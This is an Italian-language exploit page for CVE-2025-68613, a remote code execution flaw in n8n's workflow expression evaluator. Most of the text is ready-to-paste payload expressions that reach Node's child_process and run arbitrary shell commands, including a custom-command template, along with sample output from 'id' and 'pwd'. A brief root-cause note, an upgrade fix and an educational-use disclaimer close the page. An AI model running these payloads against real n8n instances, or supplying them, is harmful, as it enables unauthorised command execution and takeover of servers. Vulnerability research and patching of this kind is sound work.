
CVE-2025-68613: exploit e documentazione della vulnerabilità RCE in n8n
n8n contiene una vulnerabilità critica di Esecuzione di Codice Arbitrario nel suo sistema di valutazione delle espressioni dei flussi di lavoro. In determinate condizioni, le espressioni fornite da utenti autenticati durante la configurazione del flusso di lavoro possono essere valutate in un contesto di esecuzione non sufficientemente isolato dal runtime sottostante.
Incollare questo payload nel campo espressione:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Comando ID:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Comando PWD:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Template Comando Personalizzato:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
Per il comando id:
uid=1000(node) gid=1000(node) groups=1000(node)
Per il comando pwd:
/app
Il valutatore di espressioni non ha un sanitizzatore per impedire alle espressioni di funzione di accedere a this.process (oggetto process di Node.js), consentendo l'accesso ai moduli di sistema.
Effettuare l'upgrade a n8n v1.122.0 o successivo.
Avvertenza: Queste informazioni sono fornite solo a scopo di sandbox e didattico. L'uso non autorizzato di queste informazioni per sfruttare i sistemi è illegale e non etico. Ottenere sempre la debita autorizzazione prima di testare o sfruttare vulnerabilità.